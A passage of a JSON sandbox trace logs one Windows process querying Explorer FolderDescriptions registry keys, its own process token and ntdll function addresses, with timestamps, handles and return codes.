"value": "C:\\Program Files" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ProgramFilesDir" } ], "repeated": 0, "id": 538 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000029c" } ], "repeated": 0, "id": 539 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000290" } ], "repeated": 0, "id": 540 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x00000008" }, { "name": "TokenHandle", "value": "0x00000290" } ], "repeated": 0, "id": 541 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 542 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "25" }, { "name": "TokenInformation", "value": "p\\xc0\\x7f\\x00\\x00\\x00\\x00\\x00`\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 543 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions" }, { "name": "Handle", "value": "0x0000029c" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions" } ], "repeated": 0, "id": 544 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x0000029c" }, { "name": "SubKey", "value": "{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}" }, { "name": "Handle", "value": "0x00000298" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}" } ], "repeated": 0, "id": 545 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000029c" } ], "repeated": 0, "id": 546 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "Category" }, { "name": "Data", "value": "2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Category" } ], "repeated": 0, "id": 547 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "Name" }, { "name": "Data", "value": "SystemX86" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Name" } ], "repeated": 0, "id": 548 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "ParentFolder" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\ParentFolder" } ], "repeated": 0, "id": 549 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "Description" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Description" } ], "repeated": 0, "id": 550 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "RelativePath" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\RelativePath" } ], "repeated": 0, "id": 551 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "ParsingName" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\ParsingName" } ], "repeated": 0, "id": 552 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "InfoTip" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\InfoTip" } ], "repeated": 0, "id": 553 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "LocalizedName" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\LocalizedName" } ], "repeated": 0, "id": 554 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "Icon" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Icon" } ], "repeated": 0, "id": 555 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "Security" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Security" } ], "repeated": 0, "id": 556 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "StreamResource" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\StreamResource" } ], "repeated": 0, "id": 557 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "StreamResourceType" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\StreamResourceType" } ], "repeated": 0, "id": 558 }, { "timestamp": "2025-11-20 10:58:26,156", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "LocalRedirectOnly" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\LocalRedirectOnly" } ], "repeated": 0, "id": 559 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "Roamable" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Roamable" } ], "repeated": 0, "id": 560 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "PreCreate" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\PreCreate" } ], "repeated": 0, "id": 561 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "Stream" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Stream" } ], "repeated": 0, "id": 562 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "PublishExpandedPath" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\PublishExpandedPath" } ], "repeated": 0, "id": 563 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "DefinitionFlags" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\DefinitionFlags" } ], "repeated": 0, "id": 564 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "Attributes" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\Attributes" } ], "repeated": 0, "id": 565 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "FolderTypeID" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\FolderTypeID" } ], "repeated": 0, "id": 566 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000298" }, { "name": "ValueName", "value": "InitFolderHandler" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\InitFolderHandler" } ], "repeated": 0, "id": 567 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000298" }, { "name": "SubKey", "value": "PropertyBag" }, { "name": "Handle", "value": "0x000002a0" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{D65231B0-B2F1-4857-A4CE-A8E7C6EA7D27}\\PropertyBag" } ], "repeated": 0, "id": 568 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000298" } ], "repeated": 0, "id": 569 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x7ffee3470000" } ], "repeated": 0, "id": 570 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "LdrGetProcedureAddress", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x7ffee3470000" }, { "name": "FunctionName", "value": "RtlWow64GetCurrentMachine" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee34c0d90" } ], "repeated": 0, "id": 571 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "LdrGetProcedureAddress", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "ModuleHandle", "value": "0x7ffee3470000" }, { "name": "FunctionName", "value": "RtlWow64IsWowGuestMachineSupported" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7ffee34ec670" } ], "repeated": 0, "id": 572 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000290" } ], "repeated": 0, "id": 573 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtOpenProcessToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "DesiredAccess", "value": "0x00000008" }, { "name": "TokenHandle", "value": "0x00000290" } ], "repeated": 0, "id": 574 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "29" }, { "name": "TokenInformation", "value": "\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 575 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "25" }, { "name": "TokenInformation", "value": "p\\xc0\\x7f\\x00\\x00\\x00\\x00\\x00`\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x10\\x000\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 576 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions" }, { "name": "Handle", "value": "0x00000298" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions" } ], "repeated": 0, "id": 577 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000298" }, { "name": "SubKey", "value": "{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}" }, { "name": "Handle", "value": "0x000002a4" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}" } ], "repeated": 0, "id": 578 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000298" } ], "repeated": 0, "id": 579 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002a4" }, { "name": "ValueName", "value": "Category" }, { "name": "Data", "value": "2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Category" } ], "repeated": 0, "id": 580 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002a4" }, { "name": "ValueName", "value": "Name" }, { "name": "Data", "value": "System" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Name" } ], "repeated": 0, "id": 581 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a4" }, { "name": "ValueName", "value": "ParentFolder" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\ParentFolder" } ], "repeated": 0, "id": 582 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a4" }, { "name": "ValueName", "value": "Description" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Description" } ], "repeated": 0, "id": 583 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a4" }, { "name": "ValueName", "value": "RelativePath" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\RelativePath" } ], "repeated": 0, "id": 584 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a4" }, { "name": "ValueName", "value": "ParsingName" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\ParsingName" } ], "repeated": 0, "id": 585 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a4" }, { "name": "ValueName", "value": "InfoTip" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\InfoTip" } ], "repeated": 0, "id": 586 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a4" }, { "name": "ValueName", "value": "LocalizedName" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\LocalizedName" } ], "repeated": 0, "id": 587 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a4" }, { "name": "ValueName", "value": "Icon" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Icon" } ], "repeated": 0, "id": 588 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a4" }, { "name": "ValueName", "value": "Security" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\Security" } ], "repeated": 0, "id": 589 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a4" }, { "name": "ValueName", "value": "StreamResource" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\StreamResource" } ], "repeated": 0, "id": 590 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a4" }, { "name": "ValueName", "value": "StreamResourceType" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\StreamResourceType" } ], "repeated": 0, "id": 591 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a4" }, { "name": "ValueName", "value": "LocalRedirectOnly" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FolderDescriptions\\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\LocalRedirectOnly" } ], "repeated": 0, "id": 592 }, { "timestamp": "2025-11-20 10:58:26,172", "thread_id": "2188", "caller": "0x14001f62e", "parentcaller": "0x14001f3e6", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x000002a4" }, { "name": "ValueName", "value": "Roamable" }, { "name": "FullName", "value": 